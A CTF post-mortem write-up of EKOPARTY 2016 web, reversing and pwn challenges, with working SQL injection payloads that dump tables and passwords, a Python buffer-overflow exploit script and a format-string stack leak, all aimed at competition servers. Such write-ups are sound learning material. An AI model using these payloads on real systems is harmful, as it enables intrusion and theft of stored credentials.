EKOPARTY CTF 2016 Writeup (post-mortem)
I took part in EKOPARTY CTF 2016 and finished 182nd with 575 points.
Hidden inside EKO (misc, 50 points)
The flag is written in the background image.
EKO{th3_fl4g}
Mr. Robot (web, 25 points)
robots.txt contains the path to the file that holds the flag.
EKO{robot_is_following_us}
RFC 7230 (web, 50 points)
The flag is in the Server response header.
$ curl -v https://ctf.ekoparty.org/static/files/for50_ed4b8625b6be1bd0.zip
* Trying 52.204.197.190...
* Connected to ctf.ekoparty.org (52.204.197.190) port 443 (#0)
* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
* found 692 certificates in /etc/ssl/certs
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_256_GCM_SHA384
* server certificate verification OK
* server certificate status verification SKIPPED
* common name: ctf.ekoparty.org (matched)
* server certificate expiration date OK
* server certificate activation date OK
* certificate public key: RSA
* certificate version: #3
* subject: CN=ctf.ekoparty.org
* start date: Thu, 08 Sep 2016 22:26:00 GMT
* expire date: Wed, 07 Dec 2016 22:26:00 GMT
* issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
* compression: NULL
* ALPN, server accepted to use http/1.1
> GET /static/files/for50_ed4b8625b6be1bd0.zip HTTP/1.1
> Host: ctf.ekoparty.org
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: EKO{this_is_my_great_server}
< Date: Thu, 27 Oct 2016 23:36:39 GMT
< Content-Type: application/zip
< Content-Length: 20684
< Last-Modified: Tue, 25 Oct 2016 04:08:43 GMT
< Connection: keep-alive
< ETag: "580edacb-50cc"
< X-Frame-Options: SAMEORIGIN
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
< Strict-Transport-Security: max-age=63072000; preload
< Accept-Ranges: bytes
<
Super duper advanced attack (web, 100 points)
An SQL injection challenge. The flag is stored in a user-defined variable.
' OR 1=1 --
' UNION SELECT table_name, column_name FROM information_schema.columns --
' UNION SELECT username, password FROM users --
' UNION SELECT @flag, @flag --
EKO{do_not_forget_session_variables}
Welcome to the dark side (fbi, 25 points)
Visiting the given onion domain with Tor Browser, the flag is in the HTML source.
<!-- 25 - EKO{buy_me_some_b0ts} -->
Metadata (fbi, 50 points)
Inspecting the TLS certificate of the onion domain just visited, the flag is in the OU (organizational unit) field of the subject.
50 - EKO{is_this_just_real_life_is_this_just_fantasy}
JVM (rev, 25 points)
user@vm-kali32:~$ unzip rev25_3100aa76fca4432f.zip
Archive: rev25_3100aa76fca4432f.zip
inflating: EKO.class
user@vm-kali32:~$ jad EKO.class
Parsing EKO.class...The class file version is 52.0 (only 45.3, 46.0 and 47.0 are supported)
Generating EKO.jad
user@vm-kali32:~$ cat EKO.jad
// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3)
// Source File Name: EKO.java
public class EKO
{
public EKO()
{
}
public static void main(String args[])
{
int i = 0;
for(int j = 0; j < 1337; j++)
i += j;
String s = (new StringBuilder()).append("EKO{").append(i).append("}").toString();
}
}
user@vm-kali32:~$ python
Python 2.7.9 (default, Mar 1 2015, 12:57:24)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> sum(xrange(1337))
893116
EKO{893116}
F#ck (rev, 50 points)
A .NET executable written in F#. Decompiling it with ILSpy yields the following code.
using Microsoft.FSharp.Core;
using System;
using System.Globalization;
using System.IO;
[CompilationMapping(SourceConstructFlags.Module)]
public static class Program
{
[Serializable]
internal class teArr@9 : FSharpFunc<int, string>
{
public string str;
public int[] ccIndices;
internal teArr@9(string str, int[] ccIndices)
{
this.str = str;
this.ccIndices = ccIndices;
}
public override string Invoke(int i)
{
if (i == this.ccIndices.Length - 1)
{
return this.str.Substring(i);
}
int num = this.ccIndices[i];
return this.str.Substring(num, this.ccIndices[i + 1] - num);
}
}
public static string get_flag(string str)
{
int[] array = StringInfo.ParseCombiningCharacters(str);
int num = array.Length;
FSharpFunc<int, string> fSharpFunc = new Program.teArr@9(str, array);
if (num < 0)
{
Operators.Raise<Unit>(new ArgumentException(LanguagePrimitives.ErrorStrings.InputMustBeNonNegativeString, "count"));
}
string[] array2 = new string[num];
int num2 = 0;
int num3 = num - 1;
if (num3 >= num2)
{
do
{
array2[num2] = fSharpFunc.Invoke(num2);
num2++;
}
while (num2 != num3 + 1);
}
string[] array3 = array2;
Array.Reverse(array3);
return string.Join("", array3);
}
[EntryPoint]
public static int main(string[] argv)
{
if (argv.Length != 1)
{
ExtraTopLevelOperators.PrintFormatLine<Unit>(new PrintfFormat<Unit, TextWriter, Unit, Unit, Unit>("Usage: FlagGenerator.exe <FLAG>"));
}
else
{
string text = Program.get_flag("t#hs_siht_kc#f");
if (string.Equals(text, argv[0]))
{
FSharpFunc<string, Unit> fSharpFunc = ExtraTopLevelOperators.PrintFormatLine<FSharpFunc<string, Unit>>(new PrintfFormat<FSharpFunc<string, Unit>, TextWriter, Unit, Unit, string>("EKO{%s}"));
string func = text;
fSharpFunc.Invoke(func);
}
else
{
ExtraTopLevelOperators.PrintFormatLine<Unit>(new PrintfFormat<Unit, TextWriter, Unit, Unit, Unit>("BAD ANSWER"));
}
}
return 0;
}
}
The flag is that string reversed.
$ python
Python 2.7.12 (default, Jul 1 2016, 15:12:24)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> 't#hs_siht_kc#f'[::-1]
'f#ck_this_sh#t'
EKO{f#ck_this_sh#t}
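To make the text-element handling in get_flag concrete, here is an added Python 3 rendering of the decompiled logic (not code from the challenge binary or from the original post). It assumes that unicodedata.combining is an adequate stand-in for StringInfo.ParseCombiningCharacters for base-character-plus-combining-mark sequences, and it slices the last element from its own start index rather than from the loop index as the decompiled Substring(i) does; the two agree only when every text element is a single character, which holds for the ASCII challenge string.

```python
import unicodedata

def parse_combining_characters(s):
    """Start index of each text element (a base character plus the combining
    marks that follow it). Assumption: unicodedata.combining() is a close
    enough stand-in for .NET's StringInfo.ParseCombiningCharacters here."""
    return [i for i, ch in enumerate(s) if i == 0 or not unicodedata.combining(ch)]

def get_flag(s):
    """Mirror of the decompiled get_flag: split s into text elements, reverse
    the list, join. The last element is sliced from indices[-1]; the decompiled
    code uses Substring(i) with the loop index, which only agrees when every
    element is one character long (true for the ASCII challenge string)."""
    indices = parse_combining_characters(s)
    elements = [s[start:end] for start, end in zip(indices, indices[1:] + [len(s)])]
    return "".join(reversed(elements))

def naive_reverse(s):
    """The plain [::-1] from the interactive session above: identical for
    ASCII, but it separates combining marks from their base characters."""
    return s[::-1]

if __name__ == "__main__":
    print(get_flag("t#hs_siht_kc#f"))   # f#ck_this_sh#t
    accented = "e\u0301a"                # constructed: 'e' + combining acute, then 'a'
    print(get_flag(accented) == "ae\u0301", naive_reverse(accented) == "ae\u0301")
```

The difference only shows up on input containing combining marks: get_flag keeps the acute accent attached to its 'e', while the slice reversal moves the mark onto the 'a'.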
RrEeGgEeXx (rev, 75 points)
A .NET executable. Decompiling it with ILSpy reveals the following regex checks; the string that satisfies all of them is the flag.
if (Program.check_regex("^.{40}$", input) && Program.check_regex("\\w{3}\\{.*\\}", input) && Program.check_regex("_s.*e_", input) && Program.check_regex("\\{o{2}O{2}o{2}", input) && Program.check_regex("O{2}o{2}O{2}\\}", input) && Program.check_regex("sup3r_r3g3x_challenge", input))
EKO{ooOOoo_sup3r_r3g3x_challenge_OOooOO}
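As an added check (not part of the original post or of the challenge binary), the six patterns can be replayed with Python's re module, whose unanchored re.search behaves like .NET's Regex.IsMatch for these patterns. The build_flag helper and its prefix parameter are my own: it assembles a candidate by reading the patterns as a layout, and failing_patterns reports which constraints a candidate still violates.

```python
import re

# The six checks from the decompiled condition, in source order. Regex.IsMatch
# is unanchored, so re.search is the Python equivalent; only the first pattern
# pins the whole string (exactly 40 characters).
PATTERNS = [
    r"^.{40}$",
    r"\w{3}\{.*\}",
    r"_s.*e_",
    r"\{o{2}O{2}o{2}",
    r"O{2}o{2}O{2}\}",
    r"sup3r_r3g3x_challenge",
]

def check_regex(pattern, s):
    return re.search(pattern, s) is not None

def failing_patterns(candidate):
    """Patterns the candidate does not satisfy; an empty list means it passes."""
    return [p for p in PATTERNS if not check_regex(p, candidate)]

def build_flag(prefix="EKO"):
    """Assemble a candidate by reading the patterns as a layout (helper of my
    own, not from the binary): three word characters, then '{ooOOoo', the
    fixed phrase bracketed by the '_s...e_' underscores, then 'OOooOO}'.
    With these pieces the 40-character budget is already used up exactly."""
    return prefix + "{ooOOoo_" + "sup3r_r3g3x_challenge" + "_OOooOO}"

if __name__ == "__main__":
    flag = build_flag()
    print(flag, len(flag), failing_patterns(flag))
    # Dropping one 'O' breaks both the length check and the closing pattern.
    print(failing_patterns(flag[:-2] + "}"))
```

Note that only the length pattern is anchored, so the three word characters before the brace are unconstrained beyond \w; the EKO prefix comes from the flag format, not from the regexes.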
Ultra baby (pwn, 25 points)
The binary has a stack buffer overflow. A partial overwrite changes the return address to the start of the flag function.
from minipwn import *
#s = connect_process(['./ultrababy'])
s = socket.create_connection(('9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site', 55000))
print s.recv(8192)
s.sendall('A' * 0x18 + '\xf3' + '\n')
print s.recv(8192)
interact(s)
$ python test.py
Welcome, give me you best shot
EKO{Welcome_to_pwning_challs_2k16}
*** Connection closed by remote host ***
My first service I (pwn, 100 points)
There is a format string bug. The flag on the stack can be read as follows.
$ nc 9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site 35000
Welcome to my first service
Please input the secret key: %p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.
Invalid key: (nil).0xa.(nil).(nil).(nil).0xa.(nil).0x454b4f7b.0x4c614269.0x67426566.0x3072647d.(nil).0x25702e25.0x702e2570.0x2e25702e.0x25702e25.0x702e2570.0x2e25702e.0x25702e25.0x702e2570.
$ python
Python 2.7.12 (default, Jul 1 2016, 15:12:24)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "454b4f7b4c614269674265663072647d".decode('hex')
'EKO{LaBigBef0rd}'
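The decode above concatenates the four printed words in order. As an added helper (not from the original post), here is a Python 3 version that parses the whole %p reply, turns each word into bytes in a chosen byte order and reports the runs of consecutive words that are printable ASCII. The reply line is a copy of the one shown above; the page's decode corresponds to order 'big', and 'little' is offered as well because that is what a word read off a little-endian stack normally yields, so both candidates can be compared against the expected flag format.

```python
import string

# Copy of the service reply shown above, kept as a single constant so the
# helper runs offline.
LEAK_LINE = (
    "Invalid key: (nil).0xa.(nil).(nil).(nil).0xa.(nil).0x454b4f7b.0x4c614269."
    "0x67426566.0x3072647d.(nil).0x25702e25.0x702e2570.0x2e25702e.0x25702e25."
    "0x702e2570.0x2e25702e.0x25702e25.0x702e2570."
)

PRINTABLE = set(string.printable.encode("ascii"))

def extract_words(line):
    """The %p values as ints, in print order; '(nil)' becomes 0."""
    _, _, values = line.partition(": ")
    return [0 if tok == "(nil)" else int(tok, 16) for tok in values.rstrip(".").split(".")]

def printable_runs(words, order, width=4, min_words=2):
    """Decode each word as `width` bytes in byte order `order` ('big' or
    'little') and return the runs of at least `min_words` consecutive words
    whose bytes are all printable ASCII. A zero word or a word with a
    non-printable byte ends the current run."""
    runs, current = [], b""
    for w in words:
        chunk = w.to_bytes(width, order)
        if w != 0 and all(b in PRINTABLE for b in chunk):
            current += chunk
            continue
        if len(current) >= width * min_words:
            runs.append(current.decode("ascii"))
        current = b""
    if len(current) >= width * min_words:
        runs.append(current.decode("ascii"))
    return runs

if __name__ == "__main__":
    words = extract_words(LEAK_LINE)
    for order in ("big", "little"):
        print(order, printable_runs(words, order))
```

The second run in either byte order is the format string itself, echoed back from the input buffer, which is the usual sign that the read-back has reached the caller's own data on the stack.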
Thoughts
Other challenges I would have liked to solve:
- Congested service (misc, 100 points)
  - A challenge that requires connecting over DCCP
- X-Flag (misc, 150 points)
- Carder (web, 150 points)
- Url shortener (web, 200 points)
- Find me (fbi, 100 points)
- Secure Upload Hidden Service (fbi, 200 points)
- Old times (rev, 100 points)
  - A challenge about reading IBM OS/400 save file data (SAVF extension)
- Fuckzing reverse (rev, 250 points)
- Bleeding (pwn, 50 points)
- My first service II (pwn, 300 points)
- Certified Excel Hacker (for, 50 points)
  - A challenge about reading a password-protected VBA macro. Apparently there was a hidden sheet.
- Damaged (for, 75 points)
  - A challenge about reading a corrupted bmp file